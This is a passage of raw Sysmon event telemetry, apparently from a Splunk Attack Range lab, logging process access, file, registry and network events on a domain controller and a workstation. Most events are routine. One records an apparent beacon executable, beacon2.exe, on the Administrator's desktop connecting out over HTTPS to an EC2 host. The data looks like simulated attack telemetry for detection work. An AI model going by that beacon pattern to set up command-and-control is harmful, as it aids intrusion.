Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEB88008127485C1CB985E212A3CA503,SHA256=569A208DDC0C7DC89F9D7070B1C1435EA7C2526DF1BF63D9318635967D4D35E8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291188Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:07.896{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1600-00000000BB01}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291187Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:07.896{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1600-00000000BB01}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291186Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:07.896{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1600-00000000BB01}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291185Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:07.364{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6025FD3FD53C7012E6E703A7BAB49D85,SHA256=38C91FB51C4E3474CE3AA04EF04F9CDFD4DA893CF27FFE3602441390D24FAA38,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439856Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:07.077{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439855Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:07.077{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291184Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:07.095{BEA10069-D13E-6086-9900-00000000BB01}408NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=1385DDF0A626EB1FF1FAEF0A6E1E1E19,SHA256=D3A04D6A86810FFAE54532D83A4C2D8246C33C9E5E1AB8193B89366C377D56F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439860Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:08.831{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0C19C3E98D58AF481E94A12C3B2C400,SHA256=47F4DDEC4FF13F53BE050DC8B14B26D03F7F0BDAE4E20D116238B598C8A75979,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291191Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:06.376{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50598-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000291190Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:08.366{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D0A900E94019117709E0ADCB906F692,SHA256=AB540A59216DDF67670907B7E588C1348F24386185D5190ED17D32FCB3425EF0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439859Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:08.078{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439858Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:08.078{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291189Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:08.081{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2255C0EF921791E27C98705878AA59A2,SHA256=DC53B938670694DF1E9659CF9D138D10A5E529C2051B760D68AE8FD0DCFE1766,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439863Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:09.854{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAD0E109CCDAE00884AB14E453F899B5,SHA256=AFE71EC3A4A1962049E1B08E3172DA114D7F3CB121B6DDE44430C6EAAD56B253,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291192Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:09.384{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BFC1336220BADC02593042F0E96B519,SHA256=91EC18D108CBBD03A8112C599211E75C87BB42C45B000ADEFB1C9AF2F48FFB37,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439862Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:09.079{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439861Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:09.079{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439867Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:10.856{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8321E5FD03541A08B2122041E539C03,SHA256=5B6DA085AB3EF34F05C34D72339BF134BF0DA5B03528B2732D08F4F9CBEA00E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291193Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:10.419{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C559D650F9DBCBE1C9273E428CDB194,SHA256=444AF122A818CB391F4F9E031DE95B42AE8D8A0563CEBCEBE6C23EBC864255A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439866Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:10.283{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=203787C0228C66CFE8D66054F3363D7A,SHA256=621FF2471E9EB3550C3B61F2E3B1BDADAD4DE19C83A0014FE7B69C7821C8CB45,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439865Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:10.080{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439864Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:10.080{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439875Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:11.893{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B9B89B368F2D45570902AE8C9514E0F,SHA256=12D85A231B1AE02D2BD2EDB94D4DB342A5F008E56ED52428194DDFE562C25658,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291194Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:11.423{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DD2B131833858359780AC9A249B839A,SHA256=41F80E9ACA3D2572316362827BF5B4AC1C0F4C87A312D150614C009586BC8E2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439874Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:07.682{42DC5269-15AB-6087-FD0C-00000000BA01}5180C:\Users\Administrator\Desktop\beacon2.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-932.attackrange.local62376-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 354300x8000000000000000439873Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:07.662{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62375-false10.0.1.12-8000- 13241300x8000000000000000439872Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:22:11.523{42DC5269-CEA9-6086-2700-00000000BA01}2744C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\BD98497A-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_BD98497A-0000-0000-0000-100000000000.XML 13241300x8000000000000000439871Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:22:11.521{42DC5269-CEA9-6086-2700-00000000BA01}2744C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\27BFFEDA-C991-4635-B8B0-B42365118228\Config SourceDWORD (0x00000001) 13241300x8000000000000000439870Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:22:11.521{42DC5269-CEA9-6086-2700-00000000BA01}2744C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\27BFFEDA-C991-4635-B8B0-B42365118228\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_27BFFEDA-C991-4635-B8B0-B42365118228.XML 10341000x8000000000000000439869Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:11.080{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439868Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:11.080{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439879Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:12.901{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F9F3ABEC4AD7EEBC15F4CAA24BB3010,SHA256=2A863EED86E13CF415A8D6B3440731334AE5A29BB9E363BB86EEE718E7EDD89D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291196Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:12.459{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=866393B2342D3DA0870E433C14980232,SHA256=9B4D8E3114E41B0410510555A168D7CC7A3448D969FCFF869E75117040FCF6C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439878Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:12.545{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=736C3FB4E65764E82C91DF47A909250B,SHA256=25411C2D4A560617DA7224C19B76C65E2EE4963F989E6134BCE223EDF7D08664,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439877Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:12.081{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439876Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:12.081{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291195Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:12.089{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FC16FE3C593D11D76DCD83F511DE9D09,SHA256=128746EB7D82833E3DCE910A71246CB394B21F0F41BD9A190A1881642CAB4894,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291198Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:13.493{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6722E0E8ABEC44E879BEB162776479B2,SHA256=A453FFDED9EF3789CE8BD89676796DB262EB3EF4BA7EA7F525295A27C3B97A31,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439887Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:09.985{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local62379-truefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local389ldap 354300x8000000000000000439886Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:09.985{42DC5269-CEA9-6086-2700-00000000BA01}2744C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local62379-truefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local389ldap 354300x8000000000000000439885Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:09.980{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local62378-truefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local389ldap 354300x8000000000000000439884Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:09.980{42DC5269-CEA9-6086-2700-00000000BA01}2744C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local62378-truefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local389ldap 354300x8000000000000000439883Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:09.968{42DC5269-CE99-6086-0D00-00000000BA01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local62377-truefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local135epmap 354300x8000000000000000439882Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:09.968{42DC5269-CEA9-6086-2700-00000000BA01}2744C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local62377-truefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local135epmap 10341000x8000000000000000439881Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 